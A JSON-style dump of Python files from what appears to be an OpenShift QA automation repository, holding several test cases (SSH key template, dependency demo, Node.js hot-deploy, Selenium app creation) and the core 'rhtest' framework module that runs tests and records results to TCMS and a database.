tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6837678551673889, "alphanum_fraction": 0.6837678551673889, "avg_line_length": 20.23214340209961, "blob_id": "482eb9d67418e07de1c470e13404cb74bbfcd883", "content_id": "8f98df0e5082282170fe428263543186a2f3e468", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1189, "license_type": "no_license", "max_line_length": 62, "num_lines": 56, "path": "/automation/open/testmodules/RT/client/template.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.key_filename=\"my_testing_second_key\"\n\tself.new_keyname=\"second\"\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass AddSSHKey(OpenShiftTest):\n def test_method(self):\n\n\t\n\tif case.testcase_status == 'PASSED':\n\t return self.passed(\"%s passed\" % self.__class__.__name__)\n\tif case.testcase_status == 'FAILED':\n\t return self.failed(\"%s failed\" % self.__class__.__name__)\n\t\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddSSHKey)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6674107313156128, "alphanum_fraction": 0.6690848469734192, "avg_line_length": 23.547945022583008, "blob_id": "958cc3f8f72e6fcd0e45c6d02c53425f4c99b064", "content_id": "d222ef05db3b4359bfe2a40b4307f9f7994da6e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 83, "num_lines": 73, "path": "/automation/open/testmodules/RT/Demo01.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\n\"\"\"\nimport rhtest\nimport database\nimport time\n\nimport random\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'STG']\n\n def initialize(self):\n self.msg = self.config.msg\n\n def finalize(self):\n pass\n\n\nclass TestPreReqPass(OpenShiftTest):\n def test_method(self):\n self.info(\"%s\" % self.msg)\n return self.passed(\"test passed.\")\n\nclass DependentParent(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"TestPreReqPass\")]\n\n def test_method(self):\n self.info(\"This is the parent...\")\n return self.passed(\"test passed.\")\n\nclass DependentOne(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentParent\")]\n \n def test_method(self):\n self.info(\"This is the child #1...\")\n return self.passed(\"test passed.\")\n\nclass DependentTwo(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentParent\")]\n \n def test_method(self):\n self.info(\"This is the child #2...\")\n return self.failed(\"test failed.\")\n\nclass DependentThree(OpenShiftTest):\n PREREQUISITES = [rhtest.PreReq(\"DependentOne\"), rhtest.PreReq(\"DependentTwo\") ]\n \n def test_method(self):\n # this test will NOT be executed unless DependentOne & DependentTwo passed\n self.info(\"This is the child #3, you shouldn't NEVER see this message...\")\n return self.passed(\"test passed.\")\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(TestPreReqPass)\n suite.add_test(DependentParent)\n suite.add_test(DependentOne)\n suite.add_test(DependentTwo)\n suite.add_test(DependentThree)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7064748406410217, "alphanum_fraction": 0.7208632826805115, "avg_line_length": 23.821428298950195, "blob_id": "0846fb54ab946b54e1a9279792a5d819670a53c5", "content_id": "ab1b469d30eefdc0fb2e1090a00e6b8858eb2e53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 695, "license_type": "no_license", "max_line_length": 115, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_scaling_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_with_jenkins import NodeJSHotDeployWithJenkins\n\nclass NodeJSScalingHotDeployWithJenkins(NodeJSHotDeployWithJenkins):\n def __init__(self, config):\n NodeJSHotDeployWithJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - with Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSScalingHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6047156453132629, "alphanum_fraction": 0.6287563443183899, "avg_line_length": 27.077922821044922, "blob_id": "cd18a703b443b91a6be202edf44781204ca1bb2d", "content_id": "1f92124d628a13b369180511a79ca9e8b2e5f7f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2163, "license_type": "no_license", "max_line_length": 211, "num_lines": 77, "path": "/automation/open/testmodules/UI/web/case_180945.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180945.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateRubyAndRailsApp(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n #web.delete_app(\"ruby19\")\n #create a ruby1.9 app\n #web.create_app(\"rails\",\"rubyonrails\")\n web.go_to_create_app(\"rails\")\n web.input_by_id(\"application_name\", \"rubyonrails\")\n web.click_element_by_id(\"application_submit\")\n time.sleep(50)\n web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n \n #check the \"appurl\" link\n time.sleep(500)\n web.go_to_app_detail(\"rubyonrails\")\n web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n time.sleep(5)\n web.assert_text_equal_by_xpath(\"OpenShift - Rails 3.2\",'''//h1''') \n\n #delete a rubyonrails app\n web.go_to_app_detail(\"rubyonrails\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_id(\"application_submit\")\n time.sleep(40)\n web.go_to_app_detail(\"rubyonrails\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_180945--CreateRubyAndRailsApp passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateRubyAndRailsApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_180945.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5615406036376953, "alphanum_fraction": 0.5645065903663635, "avg_line_length": 39.207096099853516, "blob_id": "c6602fa69aceb97be76743b62413972c89a39e0e", "content_id": "f53480641dbebb15f7960bc6f0628b7b0569258b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69117, "license_type": "no_license", "max_line_length": 273, "num_lines": 1719, "path": "/automation/open/lib/rhtest.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Forked from pyNMS qatest module.\n\n\"\"\"\nThis module contains the test case and test suite classes used to control\nthe running of tests and provides a basic framework for automated testing.\nIt is the core part of automated testing.\n\nThis module defines a Test class, which is the base class for all test\ncase implementations. This class is not normally substantiated itself, but\na subclass is defined that defines a 'test_method()' method. \n\nTo use the test case, instantiate your class and call it with test method\nparameters. You can define two hook methods in the subclass: 'initialize'\nand 'finalize'. These are run at the beginning and end of the test,\nrespectively.\n\n\nAll test related errors are based on the 'TestError' exception. If a test\ncannot be completed for some reason you may raise a 'TestIncompleteError'\nexception.\n\nYour 'test_method()' should return the value of the 'passed()' or\n'failed()' method, as appropriate. You may also use assertions. The\nstandard Python 'assert' keyword may be used, or the assertion test\nmethods may be used.\n\nUsually, a set of test cases is collected in a TestSuite object, and run\nsequentially by calling the suite instance. \n\n\"\"\"\n\nimport sys, os\nimport shutil\nimport debugger\nimport datetime\nimport scheduler\nimport timelib\nimport signal\nimport database\nimport re\nimport traceback\nimport inspect\nfrom helper import TimeoutError, cmd_get_status_output, get_tmp_dir\nimport time\nimport testcase\nimport tcms_base\nimport tcms\n\n__all__ = [ 'Test', 'PreReq', 'TestSuite', 'repr_test', 'initialize', 'finalize']\n\n# exception classes that may be raised by test methods.\nclass TestError(AssertionError):\n \"\"\"TestError() Base class of testing errors.\"\"\"\n pass\n\nclass TestIncompleteError(TestError):\n \"\"\"Test case disposition could not be determined.\"\"\"\n pass\n\nclass TestFailError(TestError):\n \"\"\"Test case failed to meet the pass criteria.\"\"\"\n pass\n\nclass TestSuiteAbort(RuntimeError):\n \"\"\"Entire test suite must be aborted.\"\"\"\n pass\n\nclass TestSuiteWaived(RuntimeError):\n \"\"\"Entire test suite must be aborted.\"\"\"\n pass\n\n# \"public\" exceptions\nadd_exception(TestIncompleteError)\nadd_exception(TestFailError)\nadd_exception(TestSuiteAbort)\n\n\n# One of the below values should be returned by test_method(). The usual\n# method is to return the value of the method with the same name. E.g.\n# 'return self.passed()'. The Test.passed() method adds a passed message\n# to the report, and returns the PASSED value for the suite to check.\n\n# for multiple UUTs we use this status to indicate whether or not the \n# test ran to completeion.\nCOMPLETED = Enum(2, \"COMPLETED\")\n\n# test_method() passed, and the suite may continue.\nPASSED = Enum(1, \"PASSED\")\n\n# test_method() failed, but the suite can continue. You may also raise a\n# TestFailError exception.\nFAILED = Enum(0, \"FAILED\") \n\n# test_method() could not complete, and the pass/fail criteria could not be\n# determined. but the suite may continue. You may also raise a TestIncompleteError\n# exception.\nINCOMPLETE = Enum(-1, \"INCOMPLETE\") \n\n# test_method() could not complete, and the suite cannot continue. Raising\n# TestSuiteAbort is the same.\nABORT = Enum(-2, \"ABORT\") \n\nSKIP = Enum(-3, \"SKIP\") \n\nWAIVED = Enum(-4, \"WAIVED\") \n\n# default report message\nNO_MESSAGE = \"no message\"\n\n\n\n######################################################\n# abstract base class of all tests\nclass Test(object):\n \"\"\"Base class for all test cases. The test should be as atomic as possible.\n Multiple instances of these may be run in a TestSuite object. Be sure to\n set the PREREQUISITES class-variable in the subclass if the test has a\n prerequisite test.\"\"\"\n # prerequisite tests are static, defined in the class definition.\n # They are defined by the PreReq class. The PreReq class takes a name of a\n # test case (which is the name of the Test subclass) and any arguments that\n # the test requires. A unique test case is defined by the Test class and\n # its specific arguments. The PREREQUISITES class attribute is a list of\n # PreReq objects.\n # e.g. PREREQUISITES = [PreReq(\"MyPrereqTest\", 1)]\n PREREQUISITES = []\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = None # type of test we are running \n\n def __init__(self, config):\n self._tests = {}\n self._testname = self.__class__.__name__\n self._tests[self._testname] = self._testname\n self.config = config \n self.config.test_name = self.__class__.__name__\n self.config.tests= self._tests\n self.config.total_time = 0\n self._report = config.report \n self._ui = config.userinterface\n self._debug = config.options.DEBUG \n self._verbose = config.options.VERBOSE\n self._tcms_stuff = {\n 'current_testcase_id': None, \n 'current_testcase_run_id': None, \n 'current_test_run_id': None } # hold tcms stuff\n\n if self.config.__dict__.has_key(\"tcms_arguments\") and isinstance(self.config.tcms_arguments, dict):\n if self.config.tcms_arguments.has_key(\"variants\"):\n self.info(\"Warning: Obsolete format for test_variant in TCMS. Please use {'variant': 'php'} format instead.\")\n if isinstance(self.config.tcms_arguments[\"variants\"],list):\n self.info(\"Warning: List in variants is not supported. Only the first item will be used.\")\n self.test_variant = self.config.tcms_arguments[\"variants\"][0]\n self.config.test_variant = self.config.tcms_arguments[\"variants\"][0]\n else:\n self.test_variant = self.config.tcms_arguments[\"variants\"]\n self.config.test_variant = self.config.tcms_arguments[\"variants\"]\n elif self.config.tcms_arguments.has_key(\"variant\"):\n if isinstance(self.config.tcms_arguments[\"variant\"],list):\n self.info(\"Warning: List in variant is not supported. Only the first item will be used.\")\n self.test_variant = self.config.tcms_arguments[\"variant\"][0]\n self.config.test_variant = self.config.tcms_arguments[\"variant\"][0]\n else:\n self.test_variant = self.config.tcms_arguments[\"variant\"]\n self.config.test_variant = self.config.tcms_arguments[\"variant\"]\n \n #this is only for developing/debugging\n # - it's easier to just setup variable instead of .conf file\n if os.getenv(\"OPENSHIFT_test_variant\"):\n self.test_variant = os.getenv(\"OPENSHIFT_test_variant\")\n self.config.test_variant = self.test_variant\n\n self.tcms_testcaserun_id = self.config.tcms_testcaserun_id\n self.tcms_obj = self.config.tcms_obj\n #print \"----->\", self.config.tcms_obj\n\n\n # XXX: this flag attribute should be added with slstorage.\n if not config.has_key('NORECORD'):\n config['NORECORD'] = False\n self._norecord= config.NORECORD\n\n self.disposition = {}\n self.configfile = os.path.join(os.path.dirname(sys.modules[self.__module__].__file__), \"%s.conf\" % (self._tests[self._testname],))\n\n self._steps = [] #list of TestSteps\n self._steps_output = dict() #list of TestSteps's outputs\n\n def __call__(self, *args, **kw):\n cf = self.config\n if os.path.isfile(self.configfile):\n execfile(self.configfile, cf.__dict__)\n #cf.mergefile(self.configfile)\n #self.info('xxx', 1)\n try:\n cf.config_ID = os.path.basename(cf.config_ID.split()[1])\n except AttributeError:\n cf.config_ID = None\n except IndexError:\n cf.config_ID = \"<undefined>\"\n print >>sys.stderr, 'Make sure your config file is type \"ktext\" in Perforce.'\n else:\n cf.config_ID = None\n # this heading displays the test name just as a PREREQUISITES entry needs.\n self._ui.add_heading(repr_test(self._testname, args, kw), 2)\n self._report.add_heading(repr_test(self._testname, args, kw), 2)\n \n if cf.config_ID:\n self.info(\"Configuration ID: %s\" % (cf.config_ID,))\n self.starttime = timelib.now()\n self.info(\"STARTTIME: %s\" % self.timestamp(self.starttime))\n rv = None # in case of exception\n try:\n rv = self._initialize(rv)\n if rv is not None: # an exception happened\n try:\n self.update_testcaserun('ERROR')\n except:\n print \"ERROR: Unable to update TCMS status after _initialize() error: \"\n return rv\n except Exception as e:\n #TODO: how to store results into TCMS?\n self.error(\"Test initialization failed - exiting\")\n return 254\n #raise TestSuiteAbort(\"Unable to initialize testcase...\")\n # test elapsed time does not include initializer time.\n teststarttime = timelib.now()\n # run test_method\n testloops = int(cf.get(\"testloops\", 1))\n try:\n for l in xrange(testloops):\n rv = apply(self.test_method, args, kw)\n except KeyboardInterrupt:\n if self._debug:\n ex, val, tb = sys.exc_info()\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"%s: aborted by user.\" % self._tests[self._testname])\n self._finalize(rv)\n raise\n except (TestFailError, testcase.TestCaseStepFail), errval:\n rv = self.failed(\"Caught Fail exception: %s\" % (errval,))\n except (TestIncompleteError, TimeoutError), errval:\n rv = self.incomplete(\"Caught Incomplete exception: %s\" % (errval,))\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n except AssertionError, errval:\n rv = self.failed(\"failed assertion: %s\" % (errval,))\n except TestSuiteAbort:\n ex, val, tb = sys.exc_info()\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n tb = None\n rv = self.incomplete(\"%s: ### Abort Exception occured! (%s: %s)\" % (self._tests[self._testname], ex, val))\n raise # pass this one up to suite\n\n self.endtime = timelib.now()\n minutes, seconds = divmod(self.endtime - teststarttime, 60.0)\n hours, minutes = divmod(minutes, 60.0)\n self._test_execution_time = \"%02.0f:%02.0f:%02.2f\" % (hours, minutes, seconds)\n self.config.total_time += self.endtime - teststarttime\n self.info(\"Time elapsed: %s\" % (self._test_execution_time))\n rv = self._finalize(rv)\n # if not specified in command line, then record the result by default\n #print \"CF_OPTION_RECORD: %s\" % cf.options.RECORD\n\n self.update_testcaserun()\n\n if not cf.options.TCMS:\n self.info(\"Records NOT written into TCMS...\")\n #print \"OP: %s\" % cf.options.tcms_run_details\n try:\n run_id, case_run_id, testcase_id = cf.options.tcms_run_details.split(',')\n self._tcms_stuff['current_testcase_id'] = int(testcase_id)\n self._tcms_stuff['current_testcase_run_id'] = int(case_run_id)\n self._tcms_stuff['current_test_run_id'] = int(run_id)\n except:\n pass\n\n else:\n # put TCMS related stuff here. XXX need to look for this option\n # earlier as well to start a testrun/testcaserun within TCMS, so\n # this function will just update the status. By this time, the\n # testrun will be know (saved from earlier). Update the\n # testcaserun as well if need be.\n testcase_id = self.config.tcms_obj.get_testcase_id_by_script_name(self.__module__)\n tcms_res = self.update_db_tcms(testcase_id)\n if tcms_res[1] is None:\n case_run_id = None\n else:\n case_run_id = tcms_res[1][0]['case_run_id']\n\n if tcms_res[1] is None:\n run_id = None\n else:\n run_id = tcms_res[1][0]['run_id']\n\n\n self._tcms_stuff['current_testcase_id'] = testcase_id\n self._tcms_stuff['current_testcase_run_id'] = case_run_id\n self._tcms_stuff['current_test_run_id'] = run_id\n self.info(\"Results written to TCMS...\")\n\n if not cf.options.RECORD:\n self.info(\"Records NOT stored in database\")\n else:\n self._record_results()\n self.info(\"Results written to SQL DB %s ...\" % (cf.HOST))\n\n return rv\n\n def _initialize(self, rv):\n \"\"\" Test \"\"\"\n self._report.add_heading(\"Test suite: %s\" % self.__class__.__name__, 1)\n try:\n self.initialize()\n except:\n ex, val, tb = sys.exc_info()\n self.diagnostic(\"%s (%s)\" % (ex, val))\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"Test initialization failed!\")\n self.debug(\"-\"*80)\n traceback.print_exc(file=sys.stderr)\n self.debug(\"-\"*80)\n return rv\n\n # run user's finalize() and catch exceptions. If an exception occurs\n # in the finalize() method (which is supposed to clean up from the\n # test and leave the UUT in the same condition as when it was entered)\n # then alter the return value to abort(). \n def _finalize(self, rv):\n try:\n self.finalize()\n except:\n ex, val, tb = sys.exc_info()\n self.diagnostic(\"%s (%s)\" % (ex, val))\n if self._debug:\n debugger.post_mortem(ex, val, tb)\n rv = self.abort(\"Test finalize failed!\")\n return rv\n\n def get_instance_ip(self):\n return self.config.instance_info['ip']\n\n def get_run_mode(self):\n return self.config.options.run_mode\n\n def get_variant(self):\n \"\"\"\n This function should be run inside try/except to handle cases \n when no variant is defined.\n \"\"\"\n return self.config.test_variant\n\n def timestamp(self, abstime):\n return timelib.strftime(\"%a, %d %b %Y %H:%M:%S %Z\", timelib.localtime(abstime))\n\n def logfilename(self, ext=\"log\"):\n \"\"\"Return a standardized log file name with a timestamp that should be\n unique enough to not clash with other tests, and also able to correlate\n it later to the test report via the time stamp.\"\"\"\n return \"%s-%s.%s\" % (self._tests[self._testname], timelib.strftime(\"%Y%m%d%H%M%S\", timelib.localtime(self.starttime)), ext)\n\n def _record_results(self):\n \"\"\"\n There are two types of records:\n 1. TCMS\n 2. mysql \n \"\"\"\n resid = self._update_db()\n if resid is None:\n pass\n else:\n self.info(\"TestResult ID is %s.\" % (resid,))\n try:\n self.record_results(resid)\n except:\n import traceback\n import string\n import sys\n print \"An error was thrown: %s\"\\\n %string.join(traceback.format_exception(*sys.exc_info()), '')\n pass\n\n def record_results(self, resid, testcase_id=None):\n \"\"\"Override this if you need additional result records. This method is\n passed the TestResult tables result ID for this test run, to use as the\n foreign key.\"\"\"\n pass\n\n def _update_db(self):\n ui = self.config.userinterface\n rdb = self.config.resultsdirbase\n burl = self.config.baseurl\n cf = self.config\n if self.config.comment is not None:\n if self.config.comment.startswith('='):\n self.config.comment = self.config.comment[1:]\n\n if self.config.comment.startswith('\"') and self.config.comment.endswith('\"'):\n # get rid of quotes\n self.config.comment = self.config.comment[1:-1]\n # use the hardcoded value if none is given.\n passfail = str(self.disposition[0])[0]\n build_version = cf.instance_info['build_version']\n ami_id = cf.instance_info['ami_id']\n instance_ip = cf.instance_info['ip']\n run_mode = self.config.options.run_mode\n\n database.connect2db(self.config.DBURI)\n if sys.platform.startswith('linux'):\n signal.signal(signal.SIGCHLD, signal.SIG_IGN) #to avoid warning from pipe.close from commands.getoutput\n tr = database.TestResults(\n AmiID=ami_id,\n TestName=self._tests[self._testname],\n StartTime=datetime.datetime.fromtimestamp(self.starttime),\n EndTime= datetime.datetime.fromtimestamp(self.endtime),\n TestbedID = instance_ip,\n TestScript = cf.test_name,\n ResultsDataFile = \",\".join(map(lambda s: burl + \"/testresults/\" + s[len(rdb)+1:], map(str, self.config.reportfilenames))),\n User=str(self.config.user),\n Comments = self.config.options.notes,\n PassFail=passfail,\n BuildVersion =build_version,\n RunMode = run_mode,\n TcmsTag = cf.options.tag,\n TcmsTestCaseId = self._tcms_stuff['current_testcase_id'],\n TcmsTestCaseRunId = self._tcms_stuff['current_testcase_run_id'],\n TcmsTestRunId = self._tcms_stuff['current_test_run_id'],\n )\n self.diagnostic(\"ID: %s\" % tr.id)\n return tr.id\n \n def update_db_tcms(self, testcaserun_id=None):\n \"\"\"\n tcms_obj and testrun_res are the keys to be used.\n \"\"\"\n\n status_lookup = {'PASSED': 2, 'FAILED': 3}\n tcms = self.config.tcms_obj\n testrun_id = None\n res = None\n for testrun_res in self.config.testrun_res:\n testrun_id = testrun_res['run_id']\n if testcaserun_id == testrun_res['case_id']:\n testrun_id = testrun_res['run_id']\n case_run_id = testrun_res['case_run_id']\n test_status = self.disposition[0].__str__()\n status_bit = status_lookup[test_status]\n params = {'case_run_status': status_bit, 'notes': self.config.results_url,\n 'estimated_time': self._test_execution_time}\n res = tcms.update_testcaserun(case_run_id, params)\n # update the test run status to FINISH if this is the only test in the\n # test run\n return (tcms.update_testrun(testrun_id, {'status': 0}), res)\n\n\n def save_fileobject(self, fo, name=None):\n \"\"\"Save a file-like object to results directory. You must supply a file\n name if the file-like object does not have a name.\"\"\"\n dst = self.get_pathname(name or fo.name)\n outf = file(dst, \"w\")\n shutil.copyfileobj(fo, outf)\n outf.close()\n\n def save_file(self, fname):\n \"\"\"save your generated data file into the results directory.\"\"\"\n shutil.copy(fname, os.path.expandvars(self.config.resultsdir))\n\n def save_object(self, obj, filename=None):\n \"\"\"Save an object into the filename in the results directory.\"\"\"\n if not filename:\n filename = \"%s.txt\" % (obj.__class__.__name__,)\n # kludge alert\n if filename.endswith(\".xml\"):\n self.config.resultsfilename = filename\n filename = self.get_pathname(filename)\n outf = file(filename, \"w\")\n try:\n outf.write(str(obj))\n finally:\n outf.close()\n return filename\n def get_pathname(self, filename):\n \"Return full pathname to results directory with given filename.\"\n return os.path.join(os.path.expandvars(self.config.resultsdir), os.path.basename(filename))\n\n # Tests expose the scheduler interface also\n def sleep(self, secs):\n \"\"\"Sleep method simply sleeps for specified number of seconds.\"\"\"\n return scheduler.sleep(secs)\n\n def schedule(self, delay, cb):\n \"\"\"Schedule a callback to run 'delay' seconds in the future.\"\"\"\n return scheduler.add(delay, callback=cb)\n\n def timed(self, function, args=(), kwargs={}, timeout=30):\n \"\"\"Call a method with a failsafe timeout value.\"\"\"\n sched = scheduler.get_scheduler()\n return sched.timeout(function, args, kwargs, timeout)\n\n def timedio(self, function, args=(), kwargs={}, timeout=30):\n \"\"\"Call a method with a failsafe timeout value.\"\"\"\n sched = scheduler.get_scheduler()\n return sched.iotimeout(function, args, kwargs, timeout)\n\n def run_subtest(self, _testclass, *args, **kwargs):\n \"\"\"Runs a test test class with the given arguments. \"\"\"\n inst = _testclass(self.config)\n return apply(inst, args, kwargs)\n\n def debug(self):\n \"\"\"Enter the debugger... at will.\"\"\"\n debugger.set_trace()\n\n def set_debug(self, onoff=1):\n \"\"\"Turn on or off the DEBUG flag.\"\"\"\n ov = self._debug\n self._debug = self.config.flags.DEBUG = onoff\n return ov\n\n def set_verbose(self, onoff=1):\n \"\"\"Turn on or off the VERBOSE flag.\"\"\"\n ov = self._verbose\n self._verbose = self.config.flags.VERBOSE = onoff\n return ov\n\n def prerequisites(self):\n \"Get the list of prerequisites, which could be empty.\"\n return getattr(self, \"PREREQUISITES\", [])\n\n # the overrideable methods\n def initialize(self):\n \"Hook method to initialize a test. Override if necessary.\"\n pass\n\n def finalize(self):\n \"Hook method when finalizing a test. Override if necessary.\"\n pass\n\n ### the primary test method that subclasses must define.\n def test_method(self, *args, **kw):\n \"\"\"Overrided this method in a subclass to implement a specific test.\"\"\"\n return self.failed('you must define a method named \"test_method\" in your subclass.')\n\n # result reporting methods\n def methodstring(self, meth, *args):\n \"\"\"Return a string representation of a method object plus its arguments.\"\"\"\n return \"%s(%s)\" % (meth.im_func.func_name, \", \".join(map(str, args)))\n\n def get_status(self, testcase_id=0):\n try:\n return self.disposition[testcase_id].__str__()\n except:\n # if no status has been assigned yet\n return None\n\n def update_testcaserun(self, set_status=None):\n if self.tcms_testcaserun_id != None:\n if (set_status == None):\n status = self.get_status()\n if status is None:\n self.info(\"Unable to get result of testcase, ERROR used instead\")\n status = 'ERROR'\n else:\n status = set_status\n if status not in tcms.CASE_RUN_STATUS.keys():\n status = tcms.rhtest_disposition_to_tcms_mapping[status]\n\n params = dict()\n params['case_run_status'] = tcms.CASE_RUN_STATUS[status]\n try:\n params['estimated_time'] = self._test_execution_time\n except:\n #case when aborted during suite initialization\n pass\n\n\n \"\"\"\n if self.tcms_testcaserun_notes == None:\n params = {'case_run_status' : tcms.CASE_RUN_STATUS[status],\n 'estimated_time': self._test_execution_time}\n else:\n params = {'case_run_status' : tcms.CASE_RUN_STATUS[status],\n 'notes' : self.tcms_testcaserun_notes,\n 'estimated_time': self._test_execution_time}\n \"\"\"\n try:\n self.info(\"Updating TCMS test case run [%s] ...\"%status)\n self.tcms_obj.update_testcaserun(self.tcms_testcaserun_id, params)\n self.info(\"Done.\")\n except Exception as e:\n self.error(\"ERROR: Unable to update TCMS for %s. %s\"%(self.tcms_testcaserun_id, str(e)))\n else:\n self.info(\"Warning: tcms_testcaserun_id is not defined, TestCaseRun is NOT updated\")\n\n\n def passed(self, msg=NO_MESSAGE, testcase_id=0):\n \"\"\"Call this and return if the test_method() passed. If part of\n a suite, subsequent tests may continue.\"\"\"\n self._ui.passed(msg)\n self._report.passed(msg)\n self.disposition[testcase_id] = PASSED\n return PASSED\n\n def failed(self, msg=NO_MESSAGE, testcase_id=0):\n \"\"\"Call this and return if the test_method() failed, but can continue\n the next test.\"\"\"\n self._ui.failed(msg)\n self._report.failed(msg)\n self.disposition[testcase_id] = FAILED\n return FAILED\n \n def skip(self, msg=NO_MESSAGE, testcase_id=0):\n #TODO:\n return SKIP\n\n def waived(self, msg=NO_MESSAGE, testcase_id=0):\n self._ui.abort(msg)\n self._report.abort(msg)\n self.disposition[testcase_id] = WAIVED\n return WAIVED\n\n def completed(self, msg=NO_MESSAGE):\n self._ui.completed(msg)\n self._report.completed(msg)\n return COMPLETED\n\n def incomplete(self, msg=NO_MESSAGE, testcase_id=0):\n \"\"\"Test could not complete.\"\"\"\n self._ui.incomplete(msg)\n self._report.incomplete(msg)\n self.disposition[testcase_id] = INCOMPLETE\n return INCOMPLETE\n\n def abort(self, msg=NO_MESSAGE):\n \"\"\"Some drastic error occurred, or some condition is not met, and the suite cannot continue.\"\"\"\n self._ui.abort(msg)\n self._report.abort(msg)\n #raise TestSuiteAbort\n return ABORT\n\n def debug(self, msg):\n \"\"\"Call this to record non-critical information in the report object.\"\"\"\n #print >> sys.stderr, \"DEBUG:\",msg \n self._ui.info(msg)\n self._report.info(msg)\n\n def info(self, msg):\n \"\"\"Call this to record non-critical information in the report object.\"\"\"\n self._ui.info(msg)\n self._report.info(msg)\n\n def step(self, msg):\n \"\"\"Call this to mark the beginning of one step\"\"\"\n self._ui.info(msg.center(60, '='))\n self._report.info(msg.center(60, '='))\n \n def verboseinfo(self, msg):\n \"\"\"Call this to record really non-critical information in the report\n object that is only emitted when the VERBOSE flag is enabled in the\n configuration.\"\"\"\n if self._verbose:\n self._ui.info(msg)\n self._report.info(msg)\n\n def diagnostic(self, msg):\n \"\"\"Call this one or more times if a failed condition is detected, and\n you want to record in the report some pertinent diagnostic information.\n Then return with a FAIL message.\"\"\"\n self._ui.diagnostic(msg)\n self._report.diagnostic(msg)\n\n def error(self, msg):\n \"\"\"Call this to record errors the report object.\"\"\"\n self._ui.error(\"ERROR: %s\" % msg)\n self._report.add_message(\"ERROR\", msg)\n\n # user input methods. May only be used for tests flagged as INTERACTIVE.\n def user_input(self, prompt=None):\n if self.INTERACTIVE:\n return self._ui.user_input(prompt)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n\n def choose(self, somelist, defidx=0, prompt=None):\n if self.INTERACTIVE:\n return self._ui.choose(somelist, defidx, prompt)\n else:\n raise TestIncompleteError, \"user input in non-interactive test.\"\n 